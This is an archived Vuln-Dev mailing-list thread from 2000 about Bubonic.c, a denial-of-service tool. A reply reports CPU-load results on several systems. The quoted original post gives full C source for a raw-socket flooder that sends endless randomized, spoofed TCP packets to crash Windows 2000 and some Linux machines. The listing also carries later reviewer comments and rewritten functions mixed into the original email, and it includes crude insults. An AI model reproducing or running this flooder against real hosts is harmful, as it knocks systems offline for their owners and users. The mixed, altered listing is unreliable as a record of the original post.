Vulnerability Development mailing list archives

Re: Win2k & Linux DoS


From: Wolfgang Gassner <wulfmen () HOTMAIL COM>
Date: Mon, 28 Aug 2000 10:08:09 GMT

I played around a little with Bubonic.c and
realized the following:

Winnt 4.0 SP6: CPU Load at 60 %, nothing more, but tested on LAN and
              not over the Net!
Solaris 7.0 on Ultra:  CPU Load at around 40, nothing more, but tested
         on LAN and not over the Net!

Linux(Suse6.2,6.4)     No problem at all!


VMWARE 1.0 b.194(Suse6.2 on NT) BINGO !! CPU Load 100%,
                        VMWARE not working until the flooding ended!


My tests were all done over Lan!

cu







From: "J. Oquendo" <intrusion () ENGINEER COM>
Reply-To: "J. Oquendo" <intrusion () ENGINEER COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Win2k & Linux DoS
Date: Fri, 25 Aug 2000 11:50:24 -0400
MIME-Version: 1.0
X-Originating-IP: 63.144.153.254
Received: from [207.126.127.68] by hotmail.com (3.2) with ESMTP id
MHotMailBB702EF20072D82197B9CF7E7F449C280; Fri Aug 25 14:25:22 2000
Received: from lists.securityfocus.com (lists.securityfocus.com
[207.126.127.68])by lists.securityfocus.com (Postfix) with ESMTPid
8E3161F72C; Fri, 25 Aug 2000 10:22:24 -0700 (PDT)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
(LISTSERV-TCP/IP release 1.8d) with spool id 12219647 for
VULN-DEV () LISTS SECURITYFOCUS COM; Fri, 25 Aug 2000 10:22:10 -0700
Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78])
by          lists.securityfocus.com (Postfix) with SMTP id DFE7D1EEB9 for
       <vuln-dev () lists securityfocus com>; Fri, 25 Aug 2000 08:51:45 -0700
         (PDT)
Received: (qmail 11891 invoked by alias); 25 Aug 2000 15:52:50 -0000
Received: (qmail 11886 invoked from network); 25 Aug 2000 15:52:50 -0000
Received: from rmx441-mta.mail.com (165.251.48.44) by
mail.securityfocus.com          with SMTP; 25 Aug 2000 15:52:50 -0000
Received: from web303-mc.mail.com (web303-mc.mail.com [165.251.48.164]) by
        rmx441-mta.mail.com (8.9.3/8.9.3) with SMTP id LAA01904; Fri, 25
Aug          2000 11:50:30 -0400 (EDT)
From owner-vuln-dev () SECURITYFOCUS COM Fri Aug 25 14:27:43 2000
Approved-By: BlueBoar () THIEVCO COM
Delivered-To: vuln-dev () lists securityfocus com
Delivered-To: vuln-dev () securityfocus com
X-Mailer: mail.com
Message-ID:  <383928042.967218630176.JavaMail.root () web303-mc mail com>
Sender: VULN-DEV List <VULN-DEV () SECURITYFOCUS COM>
X-To:         bugtraq () securityfocus com

Greetings everyone. While tampering with random codes when building a
theoretical tool I managed to crash my Windows2000 laptop by randomizing
TCP settings. At first it wasn't a big deal since MS has gotten me used to
seeing error codes with dumps for just about anything.

Seems this code which was in no way specified to attack any specific OS
brings the load up to extreme levels and is not limited to Win2K either.

Written on an Ultra5 running Linux (zoot), I managed to drive the load up
high after about 3 minutes, forcing the machine to lag drastically.

So in essence I give to you Bubonic.c; maybe someone else can benchmark it
and figure out what's going on.

Error code received during the WinCrash was:

STOP 0x00000041
(0x00001000,0x00001279,0x0000042a,0x00000001)
MUST_SUCCEED_POOL_EMPTY

-------- SNIP TO CODE --------

/*

 * Bubonic.c lame DoS against Windows 2000 machines
 * and certain versions of Linux (worked against an Ultra5
 * running Redhat Zoot. Should compile under anything.
 * Randomly sends TCP packets with random settings, etc.

 * Brings the load up causing the box to crash with
 * error code:

 * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
 * MUST_SUCCEED_POOL_EMPTY

 * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
 * WEE MULTICODE... www.antioffline.com/daemonic.c

 * shouts... hrmm fsck it why not...
 * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
 * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
 * Can't forget security staff all over the place.

 * Logs for the packets sent at www.antioffline.com/logged
 * Windows2K screen shots at www.antioffline.com/loads.html
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)

#else

#define FIX(x)  (x)
#endif

/*
 * Hand-rolled header layouts.  `ip_hdr`, `tcp_hdr` and `tcpopt_hdr` are
 * not referenced anywhere else in this file: the datagram that is sent is
 * assembled from the system `struct ip` / `struct tcphdr` (see `struct
 * packet` below).  Only `pseudo_hdr` is used, via `struct cksum`.
 */
struct ip_hdr {
    u_int       ip_hl:4,
                ip_v:4;
    u_char      ip_tos;
    u_short     ip_len;
    u_short     ip_id;
    u_short     ip_off;
    u_char      ip_ttl;
    u_char      ip_p;
    u_short     ip_sum;
    u_long      saddr, daddr;
};

struct tcp_hdr {
    u_short     th_sport;
    u_short     th_dport;
    u_long      th_seq;
    u_long      th_syn;
    u_int       th_x2:4,
                th_off:4;
    u_char      th_flags;
    u_short     th_win;
    u_short     th_sum;
    u_short     th_urp;
};

struct tcpopt_hdr {
    u_char  type;
    u_char  len;
    u_short value;
};

/* Pseudo header that precedes the TCP header when the TCP checksum is
 * computed (flooder() runs in_cksum() over a whole `struct cksum`). */
struct pseudo_hdr {
    u_long saddr, daddr;
    u_char mbz, ptcl;
    u_short tcpl;
};

/* Wire image handed to sendto(): IP header followed by TCP header. */
struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

/* Checksum scratch buffer: pseudo header + a copy of packet.tcp. */
struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;        /* the single datagram flooder() rewrites and resends */
struct cksum cksum;          /* filled per packet before in_cksum() on the TCP part */
struct sockaddr_in s_in;     /* destination sockaddr passed to sendto() */
u_short bgport, bgsize, pps; /* bgport: argv[3]; when zero flooder() re-rolls th_dport
                              * each iteration.  bgsize: argv[4], not read anywhere
                              * else in this file.  pps: not referenced in this file. */
u_long radd;                 /* lookup(argv[1]); written to ip_dst and ip_id */
u_long sradd;                /* lookup(argv[2]); written to ip_src, cksum.pseudo and s_in */
int sock;                    /* raw socket opened in main() */

/*
 * Print the command-line synopsis to stderr and exit(1).
 *
 * progname: argv[0], echoed on the first line.
 * Never returns.
 *
 * NOTE(review): the "size:" message literal below runs across a physical
 * line break, which is not valid C; it looks like the line was wrapped in
 * transit, so the listing as archived does not compile unchanged.
 */
void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    fprintf(stderr, "Ports are set to send and receive on port 179\n");
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet which should be no larger than
1024 should allow for xtra header info thru routes\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

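/*
 * Standard Internet (RFC 1071) one's-complement checksum over `len` bytes
 * starting at `addr`, summed as 16-bit words in host byte order.
 *
 * addr: start of the buffer; must be readable for `len` bytes.
 * len:  byte count.  An odd trailing byte is folded in as the low-address
 *       byte of a zero-padded word (the BSD in_cksum convention).  A len
 *       of zero or less sums nothing and yields 0xffff.
 * Returns the folded, complemented sum, i.e. the value stored in an IP
 * or TCP checksum field.  A buffer that already carries its own correct
 * checksum sums to zero.
 *
 * Changes from the original: `static` because a bare `inline` definition
 * in C99/C11 provides no external definition and a non-inlined call site
 * fails to link; fixed-width <stdint.h> types (identical to the BSD
 * u_short/u_char typedefs on every relevant platform, so callers are
 * unaffected); the accumulator is an unsigned 32-bit value so the carry
 * bits cannot overflow a signed int.
 */
static uint16_t in_cksum(uint16_t *addr, int len)
{
    const uint16_t *w = addr;
    uint32_t sum = 0;
    int nleft = len;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1) {
        /* place the odd byte in the first byte of a zeroed word */
        uint16_t last = 0;
        *(uint8_t *)&last = *(const uint8_t *)w;
        sum += last;
    }

    /* fold the carries out of the upper 16 bits; two rounds suffice */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (uint16_t)~sum;
}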

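/*
 * Resolve `hostname` (a name or a dotted-quad string) to an IPv4 address.
 *
 * hostname: NUL-terminated host name or numeric address.
 * Returns the address in network byte order, as held in struct in_addr,
 * widened to unsigned long (the spelled-out form of u_long) for the
 * callers that assign it to ip_src / ip_dst and the pseudo header.
 * Exits with status 1 if the name does not resolve or does not yield an
 * IPv4 address.
 *
 * The address is copied out with memcpy rather than by dereferencing
 * h_addr as a u_long: that read is 8 bytes on LP64 targets, wider than
 * the 4-byte entry gethostbyname() stores, and it assumes an alignment
 * the hostent buffer does not promise.
 */
unsigned long lookup(char *hostname)
{
    struct hostent *hp = gethostbyname(hostname);
    struct in_addr addr;

    if (hp == NULL) {
       fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
       exit(1);
    }

    /* gethostbyname() is IPv4-only in practice; make the assumption explicit */
    if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof addr
        || hp->h_addr_list[0] == NULL) {
       fprintf(stderr, "%s did not resolve to an IPv4 address\n", hostname);
       exit(1);
    }

    memcpy(&addr, hp->h_addr_list[0], sizeof addr);
    return addr.s_addr;
}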


/*
 * Fill the global `packet` (IP + TCP header) once, then resend it with
 * per-iteration field changes to `s_in` over the raw socket `sock`.
 *
 * Reads globals radd, sradd, bgport, sock; writes packet, cksum, s_in.
 * Never returns: the for loop below has no exit condition, and nothing in
 * this file reads a packet count to bound it.
 */
void flooder(void)
{
    struct timespec ts;
    int i;


    memset(&packet, 0, sizeof(packet));

    /* ts is assigned here but never passed to nanosleep() or anything
     * else in this function: the send loop has no pacing at all. */
    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    /* fixed IP header fields; ip_src is filled inside the loop */
    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
    packet.ip.ip_id             = radd;
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = radd;

    /* initial TCP header and pseudo header values */
    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0;
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
    cksum.pseudo.daddr          = sradd;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();

    /* sockaddr handed to sendto(); note it carries sradd, not radd */
    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr        = sradd;
    s_in.sin_port               = packet.tcp.th_dport;

    for(i=0;;++i) {
    /* every 1024th iteration (i & 0x3FF == 0) additionally re-rolls the
     * source port and rewrites ip_src / pseudo.saddr from sradd */
    if( !(i&0x3FF) ) {
        packet.tcp.th_sport = rand();
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack   = rand();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       /* bgport == 0 (argv[3]) means a fresh random destination port per packet */
       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = rand();

       /* checksum fields must be zero while their checksum is computed */
       packet.ip.ip_sum         = 0;
       packet.tcp.th_sum        = 0;

       cksum.tcp                = packet.tcp;

       packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));

       /* NOTE(review): the trailing `;` makes this `if` an empty statement,
        * so a failed sendto() (EPERM, ENETUNREACH, ...) is never reported
        * and the loop simply continues. */
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0);

    }
}

/*
 * Entry point: open the raw socket, drop to the real uid/gid, validate the
 * argument count, enable IP_HDRINCL, seed rand(), resolve the two hosts
 * and hand off to flooder().
 *
 * argv[1]: destination host (-> radd), argv[2]: source host (-> sradd),
 * argv[3]: port (-> bgport), argv[4]: size (-> bgsize, unused here).
 * Returns 0 only if flooder() returns, which it does not.
 */
int main(int argc, char *argv[])
{
    int on = 1;

    printf("Bubonic -- sil () antioffline com\n\n");

    /* raw sockets are a privileged operation; the socket is opened before
     * privileges are dropped so that everything after runs unprivileged */
    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    /* NOTE(review): neither return value is checked (CERT POS36-C /
     * POS37-C); if either call fails the program carries on with the
     * privileges it started with. */
    setgid(getgid()); setuid(getuid());

    /* NOTE(review): this only guarantees argv[1..3]; argv[4] is read
     * below, and with exactly four arguments it is NULL. */
    if (argc < 4)
       usage(argv[0]);

    /* tell the kernel the buffer passed to sendto() already carries the IP header */
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))
< 0)

{
       perror("setsockopt");
       exit(1);

    }

    /* seed rand() from the clock, pid and parent pid.  NOTE(review): time()
     * is not visibly declared by any header this file includes (<time.h>
     * is absent), so this appears to rely on an implicit declaration. */
    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd        = lookup(argv[1]);
    bgport      = atoi(argv[3]);
    bgsize      = atoi(argv[4]);
    sradd       = lookup(argv[2]);
    printf("AntiOffline -- Putting the Hero in Heroin\n");

    flooder();

    return 0;
}

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup
<< bubonic.c >>

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.

